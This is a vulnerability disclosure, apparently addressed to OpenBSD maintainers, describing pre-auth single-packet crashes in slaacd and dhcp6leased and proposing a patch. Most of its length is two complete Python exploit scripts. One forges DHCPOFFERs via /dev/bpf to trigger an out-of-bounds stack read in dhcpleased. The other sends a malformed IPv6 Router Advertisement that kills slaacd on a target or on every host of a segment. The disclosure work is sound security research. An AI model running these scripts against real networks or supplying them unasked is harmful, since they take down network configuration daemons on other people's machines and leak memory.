Two pre-auth single-packet DoS issues in slaacd and dhcp6leased.

Both daemons reimplement the kernel's in6_prefixlen2mask() and
substitute fatalx() for the kernel's log(LOG_ERR, ...) + return on
out-of-range input. The wire-derived prefix_len byte is propagated
to the helper without an upstream clamp; a single malformed packet
kills the daemon.

Locations:

  sys/netinet6/in6.c:1334         kernel, returns gracefully
  sbin/slaacd/engine.c:1645       userland copy, fatalx
  sbin/dhcp6leased/engine.c:1715  userland copy, fatalx

Both daemons abort all child processes; rc.d does not respawn.

SLAACD-001
----------

Path: parse_ra -> update_iface_ra_prefix -> gen_address_proposal ->
gen_addr -> in6_prefixlen2mask (sbin/slaacd/engine.c:1645) -> fatalx.

Trigger: ICMPv6 RA (type 134) with a Prefix Information option
(type 3) whose prefix_len byte > 128. 48-byte packet, hop-limit 255.
A packet to ff02::1 kills every slaacd on the L2 segment.

Live test, stock 7.8 amd64 /sbin/slaacd (2026-05-19), 3/3 with
prefix_len in {200, 129, 255}:

    May 19 07:11:40 madHatter slaacd[43921]: fatal in engine:
        in6_prefixlen2mask: invalid prefix length(200)

Each fire reaped parent + engine + frontend. Multicast variant
behaved identically: one packet, all slaacd hosts on the segment.

DHCP6LEASED-001
---------------

Path: parse_ia_pd_options DHO_IA_PREFIX branch
(sbin/dhcp6leased/engine.c:970) -> in6_prefixlen2mask
(sbin/dhcp6leased/engine.c:1715) -> fatalx.

Trigger: DHCPv6 ADVERTISE (RFC 8415) carrying an IA_PD option with
an IA_PREFIX sub-option whose prefix_len byte > 128. Daemon must be
configured for prefix delegation; the trigger is then pre-auth on
the local link.

Live test, stock 7.8 amd64 /sbin/dhcp6leased (2026-05-20), 3/3 with
prefix_len in {200, 129, 255}:

    parse_dhcp: DHCPADVERTISE, xid: 0x31e85e
    parse_ia_pd_options: prefix: 2001:db8:dead::/200
    fatal in engine: in6_prefixlen2mask: invalid prefix length(200)
    waiting for children to terminate
    frontend exiting
    terminating

All three dhcp6leased processes reaped each run.

DHCP6LEASED-002 (related, narrower)
------------------------------------

sbin/dhcp6leased/engine.c:~957, default-case fatalx on unrecognised
DHCPv6 msg_type. Upstream IMSG filtering constrains msg_type before
parse_dhcp() is reached, so reachability is narrower than
DHCP6LEASED-001. Mentioned for completeness; same fix shape.

Proposed fix
------------

Change each userland in6_prefixlen2mask to return an error rather
than abort, then handle the error at the caller (skip the option,
log_warnx, continue).

    sbin/slaacd/engine.c, sbin/dhcp6leased/engine.c:

    -void
    +int
     in6_prefixlen2mask(struct in6_addr *maskp, int len)
     {
         ...
    -    if (0 > len || len > 128)
    -        fatalx("%s: invalid prefix length(%d)", __func__, len);
    +    if (0 > len || len > 128)
    +        return (-1);
         ...
    +    return (0);
     }

Both call paths are already error-tolerant elsewhere
(slaacd parse_ra walks RA options with log_warnx+continue;
dhcp6leased parse_ia_pd_options does the same).

A defence-in-depth option-level clamp in each parser would also
close the live trigger:

    if (prefix_len > 128) {
        log_warnx("ignoring option with invalid prefix length %u",
                  prefix_len);
        continue;
    }

PoCs available on request (Python, stdlib only).

No public disclosure planned until you've had time to fix.
#!/usr/bin/env python3
"""
dhcpleased_pwn.py — live-test reproducer for DHCPLEASED-001.

Stack-buffer-overflow READ in OpenBSD dhcpleased verbose-mode log loop
(engine.c:1042-1049). Units-confusion: MINIMUM(sizeof(nameservers),
dho_len/sizeof(nameservers[0])) — first arg is BYTES (32), second is COUNT.
Iteration count exceeds the 8-element nameservers[] array when dho_len >= 36.

The bug is INFO-DISCLOSURE only — daemon does not crash; OOB stack bytes
are formatted via inet_ntop into log_debug lines emitted to stdout (when
running -d) or syslog. Gated on `dhcpleased -vv` (verbose>=2).

Mode: this script runs ON THE OPENBSD TARGET (madHatter) and uses /dev/bpf
to (a) read the DISCOVER that dhcpleased emits, capturing its xid; (b) write
back a crafted DHCPOFFER with a DHO_DOMAIN_NAME_SERVERS option of length
N*4 (N >= 9) to trigger the OOB read.

Usage on madHatter:
  # In a separate window:
  #   pkill dhcpleased
  #   dhcpleased -d -vv -i vether0 2>&1 | tee /tmp/dhcpleased.log
  # Then:
  python3 dhcpleased_pwn.py --iface vether0 --dho-len 128

Output: prints DISCOVER capture details and the crafted OFFER; expects to
see N nameservers logged by dhcpleased (vs the source-correct cap of 8).
"""

import argparse
import fcntl
import os
import socket
import struct
import sys
import time

# -- /dev/bpf ioctls (OpenBSD values, from /usr/include/net/bpf.h) ----------
# These are derived from _IOR/_IOW macros. OpenBSD uses the same layout as
# other BSDs: dir<<30 | len<<16 | group<<8 | num.

BIOCSETIF   = 0x8020426c  # _IOW('B', 108, struct ifreq)
BIOCIMMEDIATE = 0x80044270  # _IOW('B', 112, u_int)
BIOCGBLEN   = 0x40044266  # _IOR('B', 102, u_int)
BIOCSBLEN   = 0xc0044266  # _IOWR('B', 102, u_int)
BIOCPROMISC = 0x20004269  # _IO('B', 105)
BIOCSHDRCMPLT = 0x80044275  # _IOW('B', 117, u_int)
BIOCSDIRFILT = 0x8004427d   # _IOW('B', 125, u_int) — OpenBSD direction filter
# Direction filter bits: bit0=in, bit1=out. Set bit1 to filter OUT outbound;
# we want to RX only inbound, so filter mask should be 2 (drop outbound).
BPF_DIRECTION_OUT = 2
BIOCFLUSH   = 0x20004268  # _IO('B', 104)


# -- helpers ----------------------------------------------------------------

def u8(v):  return bytes([v & 0xff])
def u16(v): return struct.pack("!H", v & 0xffff)
def u32(v): return struct.pack("!I", v & 0xffffffff)


def ip_checksum(data: bytes) -> int:
    if len(data) % 2:
        data += b"\x00"
    s = 0
    for i in range(0, len(data), 2):
        s += (data[i] << 8) | data[i+1]
    while s >> 16:
        s = (s & 0xffff) + (s >> 16)
    return (~s) & 0xffff


def udp_checksum(src_ip: bytes, dst_ip: bytes, sport: int, dport: int,
                 payload: bytes) -> int:
    udp_len = 8 + len(payload)
    pseudo = src_ip + dst_ip + b"\x00\x11" + struct.pack("!H", udp_len)
    udp_hdr = struct.pack("!HHHH", sport, dport, udp_len, 0)
    return ip_checksum(pseudo + udp_hdr + payload)


# -- BPF open/bind ----------------------------------------------------------

def open_bpf(iface: str):
    """Open /dev/bpf, bind to iface, set immediate mode, return (fd, buflen)."""
    fd = os.open("/dev/bpf", os.O_RDWR)

    # Set buffer length BEFORE binding to interface
    blen = struct.pack("I", 32768)
    fcntl.ioctl(fd, BIOCSBLEN, blen)
    blen = struct.unpack("I", fcntl.ioctl(fd, BIOCGBLEN, b"\x00"*4))[0]

    # Bind to iface
    ifr = iface.encode() + b"\x00" * (32 - len(iface))
    fcntl.ioctl(fd, BIOCSETIF, ifr)

    # Immediate mode (don't buffer)
    fcntl.ioctl(fd, BIOCIMMEDIATE, struct.pack("I", 1))

    # Header complete: we provide full ethernet header on writes
    fcntl.ioctl(fd, BIOCSHDRCMPLT, struct.pack("I", 1))

    # (Direction filter omitted — parse_dhcp_discover filters by dport==67)
    return fd, blen


# -- bpf_hdr decode --------------------------------------------------------
# struct bpf_hdr { struct bpf_timeval bh_tstamp; u_int32_t bh_caplen;
#                  u_int32_t bh_datalen; u_int16_t bh_hdrlen; }
# OpenBSD bpf_timeval = { int32_t tv_sec; int32_t tv_usec; } => 8 bytes.

def parse_bpf_buf(buf: bytes):
    """Yield (timestamp, pkt_bytes) for each packet in a BPF read buffer."""
    off = 0
    while off < len(buf):
        if off + 18 > len(buf):
            break
        tv_sec, tv_usec, caplen, datalen, hdrlen = struct.unpack(
            "iiIIH", buf[off:off+18]
        )
        pkt_start = off + hdrlen
        pkt_end = pkt_start + caplen
        if pkt_end > len(buf):
            break
        yield (tv_sec + tv_usec / 1e6, buf[pkt_start:pkt_end])
        # Advance to next packet, BPF_WORDALIGN to u_int32
        rec_len = hdrlen + caplen
        rec_len = (rec_len + 3) & ~3
        off += rec_len


# -- DHCP parse -------------------------------------------------------------

def parse_dhcp_discover(pkt: bytes):
    """Parse Ether+IPv4+UDP+BOOTP. Return (xid, chaddr6, src_mac) or None."""
    if len(pkt) < 14 + 20 + 8 + 240:
        return None
    eth_dst = pkt[0:6]; eth_src = pkt[6:12]; eth_type = pkt[12:14]
    if eth_type != b"\x08\x00":
        return None
    ip = pkt[14:]
    ip_ihl = (ip[0] & 0x0f) * 4
    ip_proto = ip[9]
    if ip_proto != 0x11:  # UDP
        return None
    udp = ip[ip_ihl:]
    sport, dport = struct.unpack("!HH", udp[:4])
    if dport != 67:  # to-server
        return None
    bootp = udp[8:]
    op = bootp[0]
    if op != 1:  # BOOTREQUEST
        return None
    xid = struct.unpack("!I", bootp[4:8])[0]
    chaddr = bootp[28:28+16]
    return (xid, chaddr[:6], eth_src)


# -- Build DHCPOFFER --------------------------------------------------------

def build_offer(src_mac: bytes, dst_mac: bytes,
                src_ip: str, dst_ip: str,
                xid: int, chaddr6: bytes, yiaddr: str,
                dho_len: int) -> bytes:
    """Build a full Ether+IP+UDP+DHCPOFFER packet.

    dho_len is the length of the DHO_DOMAIN_NAME_SERVERS option payload (bytes).
    Must be multiple of 4. dho_len >= 36 triggers the OOB read in the log loop.
    """
    assert dho_len % 4 == 0, "dho_len must be multiple of 4"

    src_ip_b = socket.inet_aton(src_ip)
    dst_ip_b = socket.inet_aton(dst_ip)
    yiaddr_b = socket.inet_aton(yiaddr)

    # BOOTP / DHCP header (236 bytes)
    bootp  = u8(2)            # op = BOOTREPLY
    bootp += u8(1)            # htype = Ethernet
    bootp += u8(6)            # hlen
    bootp += u8(0)            # hops
    bootp += u32(xid)         # xid
    bootp += u16(0)           # secs
    bootp += u16(0)           # flags (unicast)
    bootp += b"\x00"*4        # ciaddr
    bootp += yiaddr_b         # yiaddr (offered)
    bootp += src_ip_b         # siaddr (server)
    bootp += b"\x00"*4        # giaddr
    bootp += chaddr6 + b"\x00"*10  # chaddr (16B, only first 6 used)
    bootp += b"\x00"*64       # sname
    bootp += b"\x00"*128      # file
    assert len(bootp) == 236

    # Magic cookie
    bootp += b"\x63\x82\x53\x63"

    # DHCP Options
    opts  = b""
    opts += u8(53) + u8(1) + u8(2)            # MSG_TYPE = OFFER
    opts += u8(54) + u8(4) + src_ip_b         # SERVER_IDENTIFIER
    opts += u8(51) + u8(4) + u32(3600)        # LEASE_TIME
    opts += u8(1)  + u8(4) + b"\xff\xff\xff\x00"  # SUBNET_MASK 255.255.255.0

    # *** THE TRIGGER ***
    # DHO_DOMAIN_NAME_SERVERS (option 6), len = dho_len
    # Pattern bytes designed to be distinctive in the log output: each IPv4
    # carries the iteration index in the first octet so we can see how far
    # past the array the loop went.
    ns_payload = b""
    n_addrs = dho_len // 4
    for i in range(n_addrs):
        # 10.<idx>.<idx>.<idx> -- recognizable as nameserver[i]
        ns_payload += bytes([10, i & 0xff, i & 0xff, i & 0xff])
    assert len(ns_payload) == dho_len
    opts += u8(6) + u8(dho_len) + ns_payload

    opts += u8(255)                            # END
    # pad to a reasonable size
    while len(opts) < 60:
        opts += b"\x00"

    payload = bootp + opts

    # UDP
    udp_cks = udp_checksum(src_ip_b, dst_ip_b, 67, 68, payload)
    udp = struct.pack("!HHHH", 67, 68, 8 + len(payload), udp_cks) + payload

    # IPv4
    total_len = 20 + len(udp)
    ip_hdr = struct.pack("!BBHHHBBH4s4s",
                         0x45, 0x00, total_len, 0x1234, 0x0000,
                         64, 17, 0, src_ip_b, dst_ip_b)
    ip_cks = ip_checksum(ip_hdr)
    ip_hdr = ip_hdr[:10] + struct.pack("!H", ip_cks) + ip_hdr[12:]

    # Ethernet
    eth = dst_mac + src_mac + b"\x08\x00"
    return eth + ip_hdr + udp


# -- main -------------------------------------------------------------------

def main():
    p = argparse.ArgumentParser(description="DHCPLEASED-001 live reproducer")
    p.add_argument("--iface", default="vether0",
                   help="Interface (default: vether0)")
    p.add_argument("--dho-len", type=int, default=128,
                   help="DHO_DOMAIN_NAME_SERVERS option length in bytes "
                        "(must be multiple of 4; >=36 triggers; <=252)")
    p.add_argument("--server-ip", default="10.99.99.1",
                   help="DHCP server IP (synthesised)")
    p.add_argument("--client-ip", default="10.99.99.100",
                   help="yiaddr to offer")
    p.add_argument("--server-mac", default="02:11:22:33:44:55",
                   help="DHCP server MAC (synthesised)")
    p.add_argument("--timeout", type=float, default=30.0,
                   help="Seconds to wait for a DISCOVER")
    p.add_argument("--count", type=int, default=1,
                   help="Number of OFFER variants to send")
    args = p.parse_args()

    assert 36 <= args.dho_len <= 252, "dho_len must be in [36, 252]"
    assert args.dho_len % 4 == 0, "dho_len must be multiple of 4"

    print(f"[*] opening BPF on {args.iface}")
    fd, blen = open_bpf(args.iface)
    print(f"[*] bpf buffer = {blen} bytes")

    server_mac = bytes.fromhex(args.server_mac.replace(":", ""))

    print(f"[*] waiting up to {args.timeout}s for DHCPDISCOVER on {args.iface}")
    print(f"[*]   (start dhcpleased -d -vv -i {args.iface} in another window)")

    deadline = time.time() + args.timeout
    xid = None
    chaddr6 = None
    client_mac = None
    while time.time() < deadline:
        try:
            buf = os.read(fd, blen)
        except BlockingIOError:
            time.sleep(0.1)
            continue
        if not buf:
            continue
        for ts, pkt in parse_bpf_buf(buf):
            r = parse_dhcp_discover(pkt)
            if r:
                xid, chaddr6, client_mac = r
                print(f"[+] captured DISCOVER  xid=0x{xid:08x}  "
                      f"chaddr={chaddr6.hex(':')}")
                break
        if xid is not None:
            break

    if xid is None:
        print("[!] no DISCOVER captured within timeout", file=sys.stderr)
        sys.exit(2)

    for i in range(args.count):
        # Build offer with the configured dho_len (or vary if multiple)
        offer = build_offer(
            src_mac=server_mac,
            dst_mac=client_mac,        # send back to dhcpleased
            src_ip=args.server_ip,
            dst_ip="255.255.255.255",  # broadcast so dhcpleased accepts
            xid=xid,
            chaddr6=chaddr6,
            yiaddr=args.client_ip,
            dho_len=args.dho_len,
        )
        print(f"[*] sending OFFER #{i+1}  dho_len={args.dho_len}  "
              f"({args.dho_len//4} nameservers)  total {len(offer)}B")
        n = os.write(fd, offer)
        print(f"[+] wrote {n} bytes to {args.iface}")
        time.sleep(0.2)

    print("[*] done — inspect dhcpleased -d -vv stdout for the log loop output")


if __name__ == "__main__":
    main()
#!/usr/bin/env python3
"""
slaacd_pwn.py — live-test reproducer for SLAACD-001.

Pre-auth single-packet DoS in OpenBSD slaacd via Prefix Information option
with prefix_len > 128. The unvalidated wire byte reaches
in6_prefixlen2mask() (engine.c:1645) which calls fatalx() when len > 128.

Path: parse_ra -> update_iface_ra -> update_iface_ra_prefix
   -> gen_address_proposal -> gen_addr -> in6_prefixlen2mask -> fatalx.

Send an ICMPv6 Router Advertisement (type 134) with a Prefix Information
option (type 3, len 4) carrying prefix_len = 129..255.

IPv6 hop-limit MUST be 255 (RFC 4861 §6.1.2). The kernel sets this
automatically for ND messages on a raw IPv6 socket, but we set it
explicitly via setsockopt for safety.

Usage:
  sudo python3 slaacd_pwn.py --iface ens33 --dst fe80::20c:29ff:fe68:35c1 \\
       --prefix-len 200

Source: 2026-05-19, k2s0 -> madHatter live-verification track.
"""

import argparse
import socket
import struct
import sys
import time

# Ensure bsd_pwn library is importable
sys.path.insert(0, "/tmp")
from bsd_pwn import checksum, packet, log  # noqa: E402


# ---------- ICMPv6 / RA / Prefix Information builders ----------

def build_prefix_info_option(prefix_len: int, prefix: bytes,
                             flags: int = 0xc0,
                             vltime: int = 0xffffffff,
                             pltime: int = 0xffffffff) -> bytes:
    """Build a Prefix Information option (type 3, length 4 -> 32 bytes).

      0                   1                   2                   3
      0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
     |     Type      |    Length     | Prefix Length |L|A| Reserved1 |
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
     |                         Valid Lifetime                        |
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
     |                       Preferred Lifetime                      |
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
     |                           Reserved2                           |
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
     |                                                               |
     +                                                               +
     |                                                               |
     +                            Prefix                             +
     |                                                               |
     +                                                               +
     |                                                               |
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+

    flags 0xc0 = L (On-link) | A (Autonomous).
    Total length = 32 bytes (option len field = 4 units of 8 bytes).
    """
    assert len(prefix) == 16, "prefix must be 16 bytes"
    opt = b""
    opt += packet.u8(3)                  # Type = Prefix Information
    opt += packet.u8(4)                  # Length = 4 (units of 8 bytes -> 32B)
    opt += packet.u8(prefix_len & 0xff)  # Prefix Length (ATTACKER-CONTROLLED)
    opt += packet.u8(flags)              # L+A flags
    opt += packet.u32(vltime)            # Valid Lifetime
    opt += packet.u32(pltime)            # Preferred Lifetime
    opt += packet.u32(0)                 # Reserved2
    opt += prefix                        # 16-byte prefix
    assert len(opt) == 32
    return opt


def build_ra_body(prefix_opt: bytes) -> bytes:
    """RA header (after the ICMPv6 type/code/cksum) + options:

      0                   1                   2                   3
      0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
     | Cur Hop Limit |M|O|  Reserved |       Router Lifetime         |
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
     |                         Reachable Time                        |
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
     |                          Retrans Timer                        |
     +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
     |   Options ...
    """
    body = b""
    body += packet.u8(64)        # Cur Hop Limit
    body += packet.u8(0)         # Flags (M=0, O=0)
    body += packet.u16(1800)     # Router Lifetime (s)
    body += packet.u32(0)        # Reachable Time
    body += packet.u32(0)        # Retrans Timer
    body += prefix_opt
    return body


def icmpv6_checksum(src: bytes, dst: bytes, icmpv6: bytes) -> int:
    """RFC 4443: ICMPv6 checksum over IPv6 pseudo-header + ICMPv6 message."""
    pseudo = src + dst
    pseudo += struct.pack("!I", len(icmpv6))    # Upper-Layer Packet Length
    pseudo += b"\x00\x00\x00"                   # zero
    pseudo += b"\x3a"                           # Next Header = ICMPv6 (58)
    return checksum.internet(pseudo + icmpv6)


def build_ra(src_ll: str, dst_ll: str, prefix_len: int,
             prefix: bytes) -> bytes:
    """Build full ICMPv6 RA payload (type 134) with PI option.

    Returns bytes ready to be passed to sock.sendto() on an
    IPPROTO_ICMPV6 raw socket. Note: with IPPROTO_ICMPV6 the kernel
    builds the IPv6 header, but it does NOT compute the ICMPv6 checksum
    when we hand it pre-built bytes for this protocol on Linux raw
    sockets — we set IPV6_CHECKSUM offset 2 so kernel computes it. We
    still compute it manually as belt-and-braces.
    """
    src = socket.inet_pton(socket.AF_INET6, src_ll)
    dst = socket.inet_pton(socket.AF_INET6, dst_ll)

    opt = build_prefix_info_option(prefix_len, prefix)
    ra_body = build_ra_body(opt)

    # ICMPv6: type(1) code(1) cksum(2) + body
    icmp = packet.u8(134) + packet.u8(0) + packet.u16(0) + ra_body
    cks = icmpv6_checksum(src, dst, icmp)
    icmp = icmp[:2] + struct.pack("!H", cks) + icmp[4:]
    return icmp


# ---------- main ----------

def main():
    p = argparse.ArgumentParser(description="SLAACD-001 live reproducer")
    p.add_argument("--iface", required=True,
                   help="Outgoing interface (e.g. ens33)")
    p.add_argument("--dst", required=True,
                   help="Destination IPv6 (link-local of victim, "
                        "or ff02::1 for all-nodes multicast)")
    p.add_argument("--src", default=None,
                   help="Source IPv6 link-local (default: pick from iface)")
    p.add_argument("--prefix-len", type=int, default=200,
                   help="Prefix length wire byte (>128 to trigger)")
    p.add_argument("--prefix", default="2001:db8::",
                   help="Prefix value (16 bytes when expanded)")
    p.add_argument("--count", type=int, default=1,
                   help="Number of RAs to send (for repro)")
    p.add_argument("--interval", type=float, default=2.0,
                   help="Seconds between sends")
    args = p.parse_args()

    iface = args.iface
    if args.src is None:
        # Pick fe80:: of this interface
        with open("/proc/net/if_inet6") as f:
            args.src = None
            for line in f:
                parts = line.strip().split()
                if len(parts) < 6 or parts[5] != iface:
                    continue
                if parts[0].startswith("fe80"):
                    h = parts[0]
                    args.src = ":".join(h[i:i+4] for i in range(0, 32, 4))
                    break
        if args.src is None:
            log.err(f"no fe80:: address on {iface}")
            sys.exit(1)

    prefix_bin = socket.inet_pton(socket.AF_INET6, args.prefix)

    log.info(f"iface={iface}  src={args.src}  dst={args.dst}")
    log.info(f"prefix={args.prefix}/{args.prefix_len}  count={args.count}")

    # Raw ICMPv6 socket
    s = socket.socket(socket.AF_INET6, socket.SOCK_RAW, socket.IPPROTO_ICMPV6)
    # Bind to interface (Linux SO_BINDTODEVICE = 25)
    s.setsockopt(socket.SOL_SOCKET, 25, iface.encode())
    # Hop limit MUST be 255 for ND (RFC 4861)
    s.setsockopt(socket.IPPROTO_IPV6, socket.IPV6_UNICAST_HOPS,
                 struct.pack("@i", 255))
    s.setsockopt(socket.IPPROTO_IPV6, socket.IPV6_MULTICAST_HOPS,
                 struct.pack("@i", 255))
    # Bind source to the link-local
    idx = socket.if_nametoindex(iface)
    s.bind((args.src, 0, 0, idx))

    payload = build_ra(args.src, args.dst, args.prefix_len, prefix_bin)
    log.info(f"ICMPv6 RA payload ({len(payload)} bytes):")
    log.info("\n" + packet.hexdump(payload))

    # Resolve dst with scope id
    sa = (args.dst, 0, 0, idx)
    for i in range(args.count):
        log.fire(f"send #{i+1}/{args.count} prefix_len={args.prefix_len}")
        n = s.sendto(payload, sa)
        log.ok(f"sent {n} bytes")
        if i < args.count - 1:
            time.sleep(args.interval)


if __name__ == "__main__":
    main()

Reply via email to